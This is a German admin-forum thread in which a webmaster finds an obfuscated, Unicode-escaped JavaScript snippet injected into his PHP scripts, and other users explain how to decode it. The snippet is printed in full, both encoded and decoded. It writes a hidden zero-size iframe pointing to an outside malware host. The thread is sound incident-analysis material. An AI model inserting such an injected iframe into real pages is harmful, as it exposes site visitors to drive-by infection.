Was bedeutet das bzw. was kann ich bei sowas lesbar machen

Ich habe ein einer meiner PHP Scripte folgendes gefunden...

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>  

Scheinbar eine hinterlassenschaft eines netten Menschen, der sich illegal zu meinem Webspace Zugang verschafft hat... Wie kann ich sowas wieder leesbar machen bzw. herausfinden was das eigentlich tut?

Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben

Content-ID: 113508

Url: https://administrator.de/forum/was-bedeutet-das-bzw-was-kann-ich-bei-sowas-lesbar-machen-113508.html

Ausgedruckt am: 15.05.2025 um 08:05 Uhr

9 Kommentare

Neuester Kommentar

Hi,

nach einer kurzen google suche komm denke ich das hier hilft dir.

http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687

gruß
Woolfsmann

Danke... Hab mal in den Artikel reingesehen... aber wie und womit DECODIERT man das ??

Ich müsste wissen was das macht.

Hi,

Ich müsste wissen was das macht.

das script fuegt einen unsichtbaren iframe auf Deiner Seite ein:

<iframe src="http://.../in.php" width=0 height=0 style='display:none'></iframe> 

Und der versucht dann sicher einen trojaner per drive-by download auszuliefern.

lg,
Slainte

OK Danke!

Aber wie hast du das decodiert?

Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...

Das ist leicht zu "decodieren". Du schnapst dir eine ASCII-Tabelle und los gehts.

\u003c

bedeutet z.B. für den Hexwert 0x3C. Schaust du den in einer ASCII Tabelle nach erhällst du dafür das Zeichen "<".
So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte

\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063

ergeben somit

<iframe src=

miniversum

oder Du ersetzt das "document.write" einfach durch ein "alert"

Moin diaz1983,

diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.

Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:

\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c

wie SlainteMhath schon vorgeturnt hat.

Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]

Hab noch ne nette Methode gefunden...

Zumindest mit Python ging das ganz einfach auf meinem Fedora-System

[peter@fedoraPC ~]# python
Python 2.5.2 (r252:60911, Sep 30 2008, 15:41:38) 
[GCC 4.3.2 20080917 (Red Hat 4.3.2-4)] on linux2
Type "help", "copyright", "credits" or "license" for more information.  

>>> print u"\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e"  
<iframe  src='http://music24shop.net/2/in.php' width='0' height='0' style='display:none'></iframe>  